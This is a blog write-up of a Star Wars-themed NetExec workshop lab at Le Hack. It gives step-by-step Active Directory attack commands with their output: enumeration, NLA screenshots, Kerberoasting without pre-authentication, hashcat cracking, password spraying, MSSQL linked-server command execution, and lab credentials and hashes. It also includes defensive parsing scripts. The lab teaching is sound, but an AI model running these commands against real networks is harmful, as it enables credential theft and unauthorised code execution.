Context

Every year Le Hack takes place in Paris. This cybersecurity event offers talks and workshops in loads of different fields.

This year again @mpgn_x64 (Martial Puygrenier), @wil_fri3d (Wilfried BÉCARD) and @_zblurx (Thomas Seigneuret) organized a NetExec workshop. I was lucky enough to attend it last year as well but only managed to compromise 1 of the 2 Active Directory domains 😔…

This year my objective was to compromise both domains 😁!

The goal of this workshop is to use exclusively NetExec to compromise 2 Active Directory domains; this year’s theme is Star Wars 🚀💫!


Discovery & Enumeration

We know that we are on the 10.0.0.0/24 network, let’s start scanning!

We can create a file called proto.txt that contains all the different protocols that are implemented in NetExec:

ssh
mssql
smb
winrm
nfs
wmi
ldap
vnc
ftp
rdp

Then loop over them to see what services are open/responding to us:

for i in $(cat proto.txt); do nxc $i targets.txt --log nxc/all-proto.txt;done
Running nxc against 4 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
MSSQL       10.0.0.8        1433   DANTOOINE        [*] Windows Server 2022 Build 20348 (name:DANTOOINE) (domain:rebels.local)
MSSQL       10.0.0.6        1433   MUSTAFAR         [*] Windows Server 2022 Build 20348 (name:MUSTAFAR) (domain:empire.local)
Running nxc against 4 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
SMB         10.0.0.6        445    MUSTAFAR         [*] Windows Server 2022 Build 20348 x64 (name:MUSTAFAR) (domain:empire.local) (signing:True) (SMBv1:False)
SMB         10.0.0.5        445    coruscant        [*] Windows Server 2022 Build 20348 x64 (name:coruscant) (domain:empire.local) (signing:True) (SMBv1:False)
SMB         10.0.0.7        445    jedha            [*] Windows Server 2022 Build 20348 x64 (name:jedha) (domain:rebels.local) (signing:True) (SMBv1:False)
SMB         10.0.0.8        445    DANTOOINE        [*] Windows Server 2022 Build 20348 x64 (name:DANTOOINE) (domain:rebels.local) (signing:True) (SMBv1:False)
Running nxc against 4 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
WINRM       10.0.0.5        5985   coruscant        [*] Windows Server 2022 Build 20348 (name:coruscant) (domain:empire.local)
WINRM       10.0.0.6        5985   MUSTAFAR         [*] Windows Server 2022 Build 20348 (name:MUSTAFAR) (domain:empire.local)
WINRM       10.0.0.7        5985   jedha            [*] Windows Server 2022 Build 20348 (name:jedha) (domain:rebels.local)
WINRM       10.0.0.8        5985   DANTOOINE        [*] Windows Server 2022 Build 20348 (name:DANTOOINE) (domain:rebels.local)
Running nxc against 4 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
Running nxc against 4 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
RPC         10.0.0.7        135    jedha            [*] Windows Server 2022 Build 20348 (name:jedha) (domain:rebels.local)
RPC         10.0.0.6        135    MUSTAFAR         [*] Windows Server 2022 Build 20348 (name:MUSTAFAR) (domain:empire.local)
RPC         10.0.0.5        135    coruscant        [*] Windows Server 2022 Build 20348 (name:coruscant) (domain:empire.local)
RPC         10.0.0.8        135    DANTOOINE        [*] Windows Server 2022 Build 20348 (name:DANTOOINE) (domain:rebels.local)
Running nxc against 4 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
LDAP        10.0.0.5        389    CORUSCANT        [*] Windows Server 2022 Build 20348 (name:CORUSCANT) (domain:empire.local) (signing:None) (channel binding:No TLS cert)
LDAP        10.0.0.7        389    JEDHA            [*] Windows Server 2022 Build 20348 (name:JEDHA) (domain:rebels.local) (signing:None) (channel binding:Never)
Running nxc against 4 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
Running nxc against 4 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
Running nxc against 4 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
RDP         10.0.0.5        3389   coruscant        [*] Windows 10 or Windows Server 2016 Build 20348 (name:coruscant) (domain:empire.local) (nla:True)
RDP         10.0.0.8        3389   DANTOOINE        [*] Windows 10 or Windows Server 2016 Build 20348 (name:DANTOOINE) (domain:rebels.local) (nla:True)
RDP         10.0.0.7        3389   jedha            [*] Windows 10 or Windows Server 2016 Build 20348 (name:jedha) (domain:rebels.local) (nla:True)
RDP         10.0.0.6        3389   MUSTAFAR         [*] Windows 10 or Windows Server 2016 Build 20348 (name:MUSTAFAR) (domain:empire.local) (nla:False)
Running nxc against 4 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

We know that there are 4 machines with the following ports open:

Machine     IP         Open ports
coruscant   10.0.0.5   135, 389, 445, 3389, 5985
MUSTAFAR    10.0.0.6   135, 445, 1433, 3389, 5985
jedha       10.0.0.7   135, 389, 445, 3389, 5985
DANTOOINE   10.0.0.8   135, 445, 1433, 3389, 5985

The 4 machine names correspond to planet names in Star Wars, this will come in handy later on.
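As an added example that is not part of the original workshop and not NetExec code, here is a small Python triage script for output in the shape of the discovery loop above. It embeds a constructed sample (a handful of the banner lines shown above), rebuilds the open-port table and /etc/hosts style lines, and flags the weak settings a defender would want to fix first: RDP with nla:False, SMB with signing:False or SMBv1:True, LDAP with signing:None and channel binding Never or No TLS cert. Function and regex names are my own.

```python
import re
from collections import defaultdict

# Constructed sample: banner lines copied from the nxc discovery output above,
# plus one progress-bar line to show that non-banner lines are ignored.
SAMPLE = """\
MSSQL       10.0.0.6        1433   MUSTAFAR         [*] Windows Server 2022 Build 20348 (name:MUSTAFAR) (domain:empire.local)
SMB         10.0.0.6        445    MUSTAFAR         [*] Windows Server 2022 Build 20348 x64 (name:MUSTAFAR) (domain:empire.local) (signing:True) (SMBv1:False)
SMB         10.0.0.5        445    coruscant        [*] Windows Server 2022 Build 20348 x64 (name:coruscant) (domain:empire.local) (signing:True) (SMBv1:False)
WINRM       10.0.0.6        5985   MUSTAFAR         [*] Windows Server 2022 Build 20348 (name:MUSTAFAR) (domain:empire.local)
LDAP        10.0.0.5        389    CORUSCANT        [*] Windows Server 2022 Build 20348 (name:CORUSCANT) (domain:empire.local) (signing:None) (channel binding:No TLS cert)
LDAP        10.0.0.7        389    JEDHA            [*] Windows Server 2022 Build 20348 (name:JEDHA) (domain:rebels.local) (signing:None) (channel binding:Never)
RDP         10.0.0.6        3389   MUSTAFAR         [*] Windows 10 or Windows Server 2016 Build 20348 (name:MUSTAFAR) (domain:empire.local) (nla:False)
RDP         10.0.0.5        3389   coruscant        [*] Windows 10 or Windows Server 2016 Build 20348 (name:coruscant) (domain:empire.local) (nla:True)
Running nxc against 4 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
"""

# One banner line: PROTO  IP  PORT  HOST  [*] free text with (key:value) groups.
LINE_RE = re.compile(
    r"^(?P<proto>[A-Z]+)\s+(?P<ip>\d+\.\d+\.\d+\.\d+)\s+(?P<port>\d+)\s+"
    r"(?P<host>\S+)\s+\[\*\]\s+(?P<rest>.*)$"
)
ATTR_RE = re.compile(r"\((?P<key>[^:()]+):(?P<val>[^()]*)\)")


def parse_banner_lines(text):
    """Yield one dict per banner line; progress bars and [+]/[-] lines are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        rec["port"] = int(rec["port"])
        rec["attrs"] = {k.strip(): v.strip() for k, v in ATTR_RE.findall(rec["rest"])}
        yield rec


def open_ports(records):
    """Map IP -> sorted list of open ports (the table in the write-up)."""
    ports = defaultdict(set)
    for r in records:
        ports[r["ip"]].add(r["port"])
    return {ip: sorted(p) for ip, p in ports.items()}


def hosts_lines(records):
    """One /etc/hosts style line per IP: ip, short name, FQDN (lower-cased)."""
    seen = {}
    for r in records:
        name = r["attrs"].get("name", r["host"]).lower()
        dom = r["attrs"].get("domain", "").lower()
        line = f"{r['ip']} {name} {name}.{dom}" if dom else f"{r['ip']} {name}"
        seen.setdefault(r["ip"], line)
    return [seen[ip] for ip in sorted(seen)]


def weak_settings(records):
    """Flag banner attributes that show a missing hardening control."""
    findings = []
    for r in records:
        a, where = r["attrs"], f"{r['proto']} {r['ip']}"
        if r["proto"] == "RDP" and a.get("nla") == "False":
            findings.append((where, "NLA disabled: pre-auth screen exposed (usernames leak)"))
        if r["proto"] == "SMB" and a.get("signing") == "False":
            findings.append((where, "SMB signing not required (relay risk)"))
        if r["proto"] == "SMB" and a.get("SMBv1") == "True":
            findings.append((where, "SMBv1 enabled"))
        if r["proto"] == "LDAP" and a.get("signing") == "None":
            findings.append((where, "LDAP signing not enforced"))
        if r["proto"] == "LDAP" and a.get("channel binding") in ("Never", "No TLS cert"):
            findings.append((where, f"LDAP channel binding: {a['channel binding']}"))
    return findings


if __name__ == "__main__":
    recs = list(parse_banner_lines(SAMPLE))
    print(open_ports(recs))
    print("\n".join(hosts_lines(recs)))
    for where, what in weak_settings(recs):
        print(f"{where}: {what}")
```

Run it against the full --log file from the loop instead of SAMPLE and the findings list is the first thing to hand to the blue team: on this lab it points straight at MUSTAFAR’s RDP without NLA and at both domain controllers accepting unsigned LDAP binds.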

Setup - /etc/hosts

We can generate a hosts file with the --generate-hosts-file flag:

nxc smb targets.txt --generate-hosts-file hosts

Then append them to /etc/hosts:

10.0.0.5 coruscant coruscant.empire.local empire.local
10.0.0.6 MUSTAFAR MUSTAFAR.empire.local
10.0.0.7 jedha jedha.rebels.local rebels.local
10.0.0.8 DANTOOINE DANTOOINE.rebels.local

RDP - (nla:False)

Something interesting stands out on the RDP protocol:

There is no NLA (Network Level Authentication) on the MUSTAFAR machine.

Network Level Authentication (NLA)

“Network Level Authentication (NLA) adds an extra layer of security to Remote Desktop connections. With NLA enabled, users must authenticate themselves before a remote session is established.” - Microsoft documentation

Knowing this, we can use the --nla-screenshot flag to capture the contents of the screen:

nxc rdp targets.txt -u 'a' -p '' --nla-screenshot
RDP         10.0.0.5        3389   coruscant        [*] Windows 10 or Windows Server 2016 Build 20348 (name:coruscant) (domain:empire.local) (nla:True)
RDP         10.0.0.7        3389   jedha            [*] Windows 10 or Windows Server 2016 Build 20348 (name:jedha) (domain:rebels.local) (nla:True)
RDP         10.0.0.8        3389   DANTOOINE        [*] Windows 10 or Windows Server 2016 Build 20348 (name:DANTOOINE) (domain:rebels.local) (nla:True)
RDP         10.0.0.5        3389   coruscant        [-] empire.local\a: (STATUS_LOGON_FAILURE)
RDP         10.0.0.7        3389   jedha            [-] rebels.local\a: (STATUS_LOGON_FAILURE)
RDP         10.0.0.6        3389   MUSTAFAR         [*] Windows 10 or Windows Server 2016 Build 20348 (name:MUSTAFAR) (domain:empire.local) (nla:False)
RDP         10.0.0.8        3389   DANTOOINE        [-] rebels.local\a: (STATUS_LOGON_FAILURE)
RDP         10.0.0.6        3389   MUSTAFAR         [-] empire.local\a: (STATUS_LOGON_FAILURE)
RDP         10.0.0.6        3389   MUSTAFAR         NLA Screenshot saved /root/.nxc/screenshots/MUSTAFAR_10.0.0.6_2025-06-28_211116.png

From the screenshot we get 2 usernames.

Let’s create a file called users/real.txt with our 2 known usernames:

grievousssssss
krennic

AS-REP Roasting & Kerberoasting (without pre-authentication)

A recent PR adding the --no-preauth-targets flag was merged and made me check this path out first.

We can check for common vulnerabilities on these accounts like Kerberoasting (without pre-authentication) and AS-REP Roasting since we have 2 valid usernames.

Note

The grievousssssss account is vulnerable to AS-REP Roasting but the password does not crack with rockyou.txt.

What about Kerberoasting without pre-authentication? It works!

nxc ldap targets.txt -u 'users/real.txt' -p '' --no-preauth-targets users/real.txt --kerberoasting kerberoasting
LDAP        10.0.0.5        389    CORUSCANT        [*] Windows Server 2022 Build 20348 (name:CORUSCANT) (domain:empire.local) (signing:None) (channel binding:No TLS cert)
LDAP        10.0.0.7        389    JEDHA            [*] Windows Server 2022 Build 20348 (name:JEDHA) (domain:rebels.local) (signing:None) (channel binding:Never)
LDAP        10.0.0.5        389    CORUSCANT        [+] empire.local\grievousssssss account vulnerable to asreproast attack
LDAP        10.0.0.7        389    JEDHA            [-] rebels.local\grievousssssss: KDC_ERR_C_PRINCIPAL_UNKNOWN
LDAP        10.0.0.7        389    JEDHA            [-] rebels.local\krennic: KDC_ERR_C_PRINCIPAL_UNKNOWN
LDAP        10.0.0.5        389    CORUSCANT        [*] Total of records returned 1
LDAP        10.0.0.5        389    CORUSCANT        $krb5tgs$23*krennic$EMPIRE.LOCAL$krennic*$63ece4853bcd11f09a36146c1bc1ae7f$37c8e639506bd49f809cd1d4414e881f29b822d705f2954b5650a8481f920e4d1dfea2305193c92b2e47
71c5b7cb7a539aeeaf9e1f534ae0ec1f0db1e801ccc78de4f91a953f7529ac121cb100ba735365f06afd5cb2e6e6c0f63679212e3aeed7014ee72d2fab3573febf901fc5d4fa06abae2468f3d691c5ea221626cdedfa693ea1da9603519f5dbc326d745dda32ca090a2
3b3026cea81ff0172fa4996a552d4a916150d9dc15883fbe4ad37a33c07010416cbb105cab76429209ac521c6aad203dfc958eec4ff3df738f268c67bb68e38ef1659e1a33c70ab4931982df465e78ca7344fceb88bf2125fe4295b1a92700a6f97c2c3535cabee4dd5
d406c60cabd1f825a91efb3e1f3e245fcdde6b415db6db8ec3e80297de4b7bc95500da9c3ada1cd7006c270176298a00f7b6ae6be6f370bd14f1cb9a46abef26d581a808ac2356708aadca9b5dc05c4dbde8b3d9c425845da6431dcf4caa492cbd89bd047683650f5cb
7c9cf2b474cebe9652e31b98b7aa81a356b599aba236dc7ea114adef1850dc72c3c74f2c42efe3456f45b2dad6a2b9cd7bd7d2f269b1f960a72dd94062b9b7d53ff2112a09a692e7e2a888e56e475e926a868991cb8f5e11a48e1f4c108d94763409bb814eafc97403e
f04bf55a6defa3b509f2ec43c17de5439e36fbb4d5574a4478f8193ff4e733170ebcdaf4f7cbf2c015894f64f6e571265313723c42f0b83b8fb75824e17593d11ad57fe85a32371e608f59d847e4b40301db0576db90590c793879ac6ef31c381e38c9edfe8dca1dd6c
4805faa7d534a81d777a1a585f1648644c7b6ac1413703c536e6caf6864e6140a81b19f22287ea0c2b2877555c46baf7c79b549f25cf1e2f304c9cf39d965c6373e37175d8f43e2a0e9cfff1b1ca43c5704d8c25536b0ec57897d6af3c480f987cc4dde65673a235a7b
2ab58b581aed1abfea95fffe25bbe9384816274a4c48c66dc16f596fe5c7e7142a75418d7d64e99a024634b56c271c3ffbe2f8941aa099baa55738ec0f90af389ed22f808980fba914bff5b34c677fecf48212ccb94321b2ec3f761c981df4a63e137f551670f6f84d7
e9e9043b639c9b595b730fddf03649983c3ca9c6da17ec3af8c1bc4c31916cd8f1c2da90f2974368cbaa61bf8c32ca06d88b5c66861d23412f98dde9ee59ec98d6d99280463d1ffefc69e2c7813c506a2034598c974beb9b6c321092110a9e98e3b56bb57e63b8f13a6
5daa32285294fb49fae3e51e3eb8837cceb0d433726a98f9ce02851add8bb403a7047a75c3a90ef347ee5e695e7c94c6a16b79b71d7d02e8ff5fd467e5e42528c65ece77dd5c95c8af2d6e75a0ee04914a48409e4eed3551588d9ba8c96f6cf3e73cb13964c24df7cd5
cfc2aa2b17e78fbef21b822f63e21022a84411d3ed13eae2948d77ab506ac33133cb2fc5b4d8afb5b774a3fd6ff8c880bff3b4966aaa91975542ebd0c8873bc03bc07b687ae83ce39624cb5133a94a52e32b77647f320a50025b63db4d387c390e13dc9fae9be8a0d00
17d1d35512594342c3d2ebe3834ffcb56a92

Check both vulnerabilities at once

We can check for Kerberoasting (without pre-authentication) and AS-REP Roasting in the same command.

nxc ldap targets.txt -u 'users/real.txt' -p '' --no-preauth-targets users/real.txt --kerberoasting kerberoasting --asreproast asreproast

We can attempt to crack it with hashcat:

hashcat --hash-type 13100 --attack-mode 0 kerberoasting  /opt/lists/rockyou.txt

This time it cracks and we get our first set of credentials!
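An added example (my own code, not from the workshop or from NetExec) that splits the hashes written by --kerberoasting and --asreproast into their fields. The sample hashes are constructed: user and realm follow the page, the hex payloads are shortened placeholders, not real ticket material. The TGS regex accepts both the `$krb5tgs$23*` shape printed above and the `$krb5tgs$23$*` variant. The defender point is the etype field: 23 means the KDC issued RC4-HMAC material, so the account still permits RC4, which is what makes the 13100 (TGS-REP) and 18200 (AS-REP) modes fast to crack. Restricting those accounts to AES, re-enabling pre-authentication, and giving SPN accounts long random passwords is the fix.

```python
import re

# Constructed samples in the shapes NetExec writes to the output files.
# Users and realm follow the page; the hex fields are shortened placeholders.
TGS_SAMPLE = (
    "$krb5tgs$23*krennic$EMPIRE.LOCAL$krennic*"
    "$63ece4853bcd11f09a36146c1bc1ae7f$37c8e639506bd49f809cd1d4414e881f"
)
ASREP_SAMPLE = (
    "$krb5asrep$23$grievousssssss@EMPIRE.LOCAL:"
    "0123456789abcdef0123456789abcdef$00112233445566778899aabbccddeeff"
)

# $krb5tgs$<etype>[$]*<user>$<realm>$<spn>*$<checksum>$<edata>
TGS_RE = re.compile(
    r"^\$krb5tgs\$(?P<etype>\d+)\$?\*(?P<user>[^$]+)\$(?P<realm>[^$]+)\$(?P<spn>[^*]+)\*"
    r"\$(?P<checksum>[0-9a-f]{32})\$(?P<edata>[0-9a-f]+)$"
)
# $krb5asrep$<etype>$<user>@<realm>:<checksum>$<edata>
ASREP_RE = re.compile(
    r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@]+)@(?P<realm>[^:]+):"
    r"(?P<checksum>[0-9a-f]{32})\$(?P<edata>[0-9a-f]+)$"
)

# hashcat modes for the RC4 (etype 23) variant of each hash kind.
HASHCAT_MODE = {("tgs", 23): 13100, ("asrep", 23): 18200}


def parse_kerberos_hash(h):
    """Split a hashcat-style Kerberos hash into its fields.

    Returns kind ('tgs' or 'asrep'), etype, user, realm, spn (tgs only),
    checksum, edata length in bytes, the matching hashcat mode (None if not
    in the table) and weak_crypto, which is True when the etype is 23, i.e.
    the KDC handed out RC4-HMAC material for this account.
    """
    kind, m = "tgs", TGS_RE.match(h)
    if not m:
        kind, m = "asrep", ASREP_RE.match(h)
    if not m:
        raise ValueError("unrecognised Kerberos hash format")
    d = m.groupdict()
    etype = int(d["etype"])
    return {
        "kind": kind,
        "etype": etype,
        "user": d["user"],
        "realm": d["realm"],
        "spn": d.get("spn"),
        "checksum": d["checksum"],
        "edata_bytes": len(d["edata"]) // 2,
        "hashcat_mode": HASHCAT_MODE.get((kind, etype)),
        "weak_crypto": etype == 23,
    }


def accounts_allowing_rc4(hashes):
    """Defender view: which accounts (user@REALM) produced RC4 material."""
    out = set()
    for h in hashes:
        p = parse_kerberos_hash(h)
        if p["weak_crypto"]:
            out.add(f"{p['user']}@{p['realm']}")
    return sorted(out)


if __name__ == "__main__":
    for sample in (TGS_SAMPLE, ASREP_SAMPLE):
        p = parse_kerberos_hash(sample)
        print(p["kind"], p["user"], p["realm"], "etype", p["etype"], "mode", p["hashcat_mode"])
    print("accounts still issuing RC4:", accounts_allowing_rc4([TGS_SAMPLE, ASREP_SAMPLE]))
```

Feed it the kerberoasting and asreproast files produced by the combined command above and the RC4 list is the remediation ticket: every account on it should have msDS-SupportedEncryptionTypes set to AES only, and pre-authentication turned back on where it was disabled.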

Credentials 🔑 - krennic

krennic:liu8Sith


Domain 1 - empire.local

Now that we have valid credentials in the empire.local domain we can do several things:

  • Dump LDAP information with --bloodhound
  • Enumerate users with --users then spray our password on them
  • Try and authenticate over different protocols with our set of credentials
  • Enumerate SMB shares
  • Run NetExec SMB modules
  • etc.

Let’s start with BloodHound so that it runs in the background:

nxc ldap scope/dc.txt -u krennic -p liu8Sith -d empire.local --dns-server 10.0.0.5 --bloodhound -c all

Then move on to creating a list of usernames:

nxc smb 10.0.0.6 -u 'krennic' -p 'liu8Sith' --users --log nxc/user-dump.txt
awk '{print $5}' nxc/user-dump.txt > users/empire-all.txt

Password spraying yields nothing:

nxc smb targets.txt -u 'users/empire-all.txt' -p 'liu8Sith' --continue-on-success

Nor do we have any interesting shares to read, apart from IPC$ which allows us to RID brute force some more local usernames on MUSTAFAR:

nxc smb targets.txt -u 'users/empire-all.txt' -p 'liu8Sith' --shares

nxc smb 10.0.0.6 -u 'krennic' -p 'liu8Sith' --rid-brute
SMB         10.0.0.6        445    MUSTAFAR         [*] Windows Server 2022 Build 20348 x64 (name:MUSTAFAR) (domain:empire.local) (signing:True) (SMBv1:False)
SMB         10.0.0.6        445    MUSTAFAR         [+] empire.local\krennic:liu8Sith 
SMB         10.0.0.6        445    MUSTAFAR         500: mustafar\localadmin (SidTypeUser)
SMB         10.0.0.6        445    MUSTAFAR         501: mustafar\Guest (SidTypeUser)
SMB         10.0.0.6        445    MUSTAFAR         503: mustafar\DefaultAccount (SidTypeUser)
SMB         10.0.0.6        445    MUSTAFAR         504: mustafar\WDAGUtilityAccount (SidTypeUser)
SMB         10.0.0.6        445    MUSTAFAR         513: mustafar\None (SidTypeGroup)
SMB         10.0.0.6        445    MUSTAFAR         1000: mustafar\SQLServer2005SQLBrowserUser$MUSTAFAR (SidTypeAlias)

Note

I also tried several SMB modules like gpp_autologin, gpp_password, etc. but no luck there.

Let’s try and connect with other protocols, starting with MSSQL since we saw that it was open earlier:

nxc mssql targets.txt -u krennic -p liu8Sith --continue-on-success             
MSSQL       10.0.0.6        1433   MUSTAFAR         [*] Windows Server 2022 Build 20348 (name:MUSTAFAR) (domain:empire.local)
MSSQL       10.0.0.8        1433   DANTOOINE        [*] Windows Server 2022 Build 20348 (name:DANTOOINE) (domain:rebels.local)
MSSQL       10.0.0.6        1433   MUSTAFAR         [+] empire.local\krennic:liu8Sith

We can successfully authenticate to the MSSQL server on MUSTAFAR (10.0.0.6) with our credentials.

MSSQL enumeration on MUSTAFAR

We can run basic SQL queries with the -q flag:

nxc mssql 10.0.0.6 -u krennic -p liu8Sith -q 'select @@version'      
MSSQL       10.0.0.6        1433   MUSTAFAR         [*] Windows Server 2022 Build 20348 (name:MUSTAFAR) (domain:empire.local)
MSSQL       10.0.0.6        1433   MUSTAFAR         [+] empire.local\krennic:liu8Sith
MSSQL       10.0.0.6        1433   MUSTAFAR         Microsoft SQL Server 2022 (RTM) - 16.0.1000.6 (X64)
    Oct  8 2022 05:58:25 
    Copyright (C) 2022 Microsoft Corporation
    Express Edition (64-bit) on Windows Server 2022 Datacenter Azure Edition 10.0 <X64> (Build 20348: ) (Hypervisor)

We can enumerate logins and see the droideka user:

nxc mssql 10.0.0.6 -u krennic -p liu8Sith -M enum_logins
MSSQL       10.0.0.6        1433   MUSTAFAR         [*] Windows Server 2022 Build 20348 (name:MUSTAFAR) (domain:empire.local)
MSSQL       10.0.0.6        1433   MUSTAFAR         [+] empire.local\krennic:liu8Sith
ENUM_LOGINS 10.0.0.6        1433   MUSTAFAR         [*] Enumerated logins
ENUM_LOGINS 10.0.0.6        1433   MUSTAFAR         Login Name                          Type            Status
ENUM_LOGINS 10.0.0.6        1433   MUSTAFAR         ----------                          ----            ------
ENUM_LOGINS 10.0.0.6        1433   MUSTAFAR         EMPIRE\krennic                      Domain User     ENABLED
ENUM_LOGINS 10.0.0.6        1433   MUSTAFAR         mustafar\localadmin                 Local User      ENABLED
ENUM_LOGINS 10.0.0.6        1433   MUSTAFAR         NT AUTHORITY\SYSTEM                 Local User      ENABLED
ENUM_LOGINS 10.0.0.6        1433   MUSTAFAR         NT Service\MSSQL$SQLEXPRESS         Local User      ENABLED
ENUM_LOGINS 10.0.0.6        1433   MUSTAFAR         NT SERVICE\SQLTELEMETRY$SQLEXPRESS  Local User      ENABLED
ENUM_LOGINS 10.0.0.6        1433   MUSTAFAR         NT SERVICE\SQLWriter                Local User      ENABLED
ENUM_LOGINS 10.0.0.6        1433   MUSTAFAR         NT SERVICE\Winmgmt                  Local User      ENABLED
ENUM_LOGINS 10.0.0.6        1433   MUSTAFAR         droideka                            SQL User        ENABLED
ENUM_LOGINS 10.0.0.6        1433   MUSTAFAR         sa                                  SQL User        DISABLED
ENUM_LOGINS 10.0.0.6        1433   MUSTAFAR         BUILTIN\Users                       Windows Group   ENABLED

There are no linked servers (only the local instance itself shows up)…

nxc mssql 10.0.0.6 -u krennic -p liu8Sith -M enum_links
MSSQL       10.0.0.6        1433   MUSTAFAR         [*] Windows Server 2022 Build 20348 (name:MUSTAFAR) (domain:empire.local)
MSSQL       10.0.0.6        1433   MUSTAFAR         [+] empire.local\krennic:liu8Sith 
ENUM_LINKS  10.0.0.6        1433   MUSTAFAR         [+] Linked servers found:
ENUM_LINKS  10.0.0.6        1433   MUSTAFAR         [*]   - mustafar\SQLEXPRESS

We can try and enable xp_cmdshell:

nxc mssql 10.0.0.6 -u krennic -p liu8Sith -M enable_cmdshell -o ACTION=enable
[*] Ignore OPSEC in configuration is set and OPSEC unsafe module loaded
MSSQL       10.0.0.6        1433   MUSTAFAR         [*] Windows Server 2022 Build 20348 (name:MUSTAFAR) (domain:empire.local)
MSSQL       10.0.0.6        1433   MUSTAFAR         [+] empire.local\krennic:liu8Sith
ENABLE_C... 10.0.0.6        1433   MUSTAFAR         [+] xp_cmdshell successfully enabled.

NetExec says that xp_cmdshell was successfully enabled but we can’t actually execute any commands with -x <CMD>, with or without --local-auth 🤔 (I’ll have to look into the module’s code to see what’s going on):

nxc mssql 10.0.0.6 -u krennic -p liu8Sith --local-auth -x whoami
MSSQL       10.0.0.6        1433   MUSTAFAR         [*] Windows Server 2022 Build 20348 (name:MUSTAFAR) (domain:empire.local)
MSSQL       10.0.0.6        1433   MUSTAFAR         [-] MUSTAFAR\krennic:liu8Sith (Login failed for user 'krennic'. Please try again with or without '--local-auth)

I ended up wasting almost an hour at this stage since I was convinced that it was the path 😔.

BloodHound Analysis 🐢

Back to the BloodHound ingest that we did earlier, we can see an interesting path for later on: fn2187 can ForceChangePassword over vader, who is a Domain Administrator in empire.local:

Bad Successor?

Another recent module implemented by @mpgn is the BadSuccessor module, based on this recent blog post by Akamai. He and @CravateRouge talk about the exploit in more detail in his latest podcast if you’re interested.

Even though we can’t exploit it directly with NetExec I was curious to just try it out and enumerate dMSA objects:

nxc ldap 10.0.0.5 -u 'krennic' -p 'liu8Sith' -M badsuccessor
LDAP        10.0.0.5        389    CORUSCANT        [*] Windows Server 2022 Build 20348 (name:CORUSCANT) (domain:empire.local) (signing:None) (channel binding:No TLS cert)
LDAP        10.0.0.5        389    CORUSCANT        [+] empire.local\krennic:liu8Sith 
BADSUCCE... 10.0.0.5        389    CORUSCANT        [-] No domain controller with operating system Windows Server 2025 found, attack not possible. Enumerate dMSA objects anyway.
BADSUCCE... 10.0.0.5        389    CORUSCANT        [+] Found 1 results
BADSUCCE... 10.0.0.5        389    CORUSCANT        vader (S-1-5-21-2236031427-1663051459-2826524466-1601), OU=Domain Controllers,DC=empire,DC=local

vader shows up as a dMSA object, but there are no Windows Server 2025 domain controllers so we can’t exploit this further.

Back to MSSQL on MUSTAFAR

Back to the users that we enumerated earlier with the enum_logins module, we can try some basic password spraying.

We can try username=password for the SQL login we saw earlier in the database:

nxc mssql scope/sql.txt -u 'droideka' -p 'droideka' --local-auth
MSSQL       10.0.0.8        1433   DANTOOINE        [*] Windows Server 2022 Build 20348 (name:DANTOOINE) (domain:rebels.local)
MSSQL       10.0.0.6        1433   MUSTAFAR         [*] Windows Server 2022 Build 20348 (name:MUSTAFAR) (domain:empire.local)
MSSQL       10.0.0.8        1433   DANTOOINE        [-] DANTOOINE\droideka:droideka (Login failed for user 'droideka'. Please try again with or without '--local-auth')
MSSQL       10.0.0.6        1433   MUSTAFAR         [+] MUSTAFAR\droideka:droideka

It works!

Credentials 🔑 - droideka

droideka:droideka

Once again we can enumerate links since this user may have different permissions:

nxc mssql scope/sql.txt -u 'droideka' -p 'droideka' --local-auth -M enum_links
MSSQL       10.0.0.6        1433   MUSTAFAR         [*] Windows Server 2022 Build 20348 (name:MUSTAFAR) (domain:empire.local)
MSSQL       10.0.0.8        1433   DANTOOINE        [*] Windows Server 2022 Build 20348 (name:DANTOOINE) (domain:rebels.local)
MSSQL       10.0.0.6        1433   MUSTAFAR         [+] MUSTAFAR\droideka:droideka 
ENUM_LINKS  10.0.0.6        1433   MUSTAFAR         [+] Linked servers found:
ENUM_LINKS  10.0.0.6        1433   MUSTAFAR         [*]   - DANTOOINE\SQLEXPRESS
ENUM_LINKS  10.0.0.6        1433   MUSTAFAR         [*]   - mustafar\SQLEXPRESS
MSSQL       10.0.0.8        1433   DANTOOINE        [-] DANTOOINE\droideka:droideka (Login failed for user 'droideka'. Please try again with or without '--local-auth')

Executing Commands on a Linked MSSQL Server

We are able to execute commands on the remote server directly; perhaps someone had already enabled xp_cmdshell there with the link_enable_cmdshell module 😆!

nxc mssql 10.0.0.6 -u 'droideka' -p 'droideka' --local-auth -M link_xpcmd -o 'LINKED_SERVER=DANTOOINE\SQLEXPRESS' CMD='whoami'
[*] Ignore OPSEC in configuration is set and OPSEC unsafe module loaded
MSSQL       10.0.0.6        1433   MUSTAFAR         [*] Windows Server 2022 Build 20348 (name:MUSTAFAR) (domain:empire.local)
MSSQL       10.0.0.6        1433   MUSTAFAR         [+] MUSTAFAR\droideka:droideka 
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         [*] Running command on DANTOOINE\SQLEXPRESS: whoami
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         [+] Executed command via linked server
LINK_XPCMD  10.0.0.6        1433   MUSTAFAR         nt service\mssql$sqlexpress

We have the SeImpersonatePrivilege which would be the classic way of elevating privileges but I don’t know of a way to do that with NetExec:

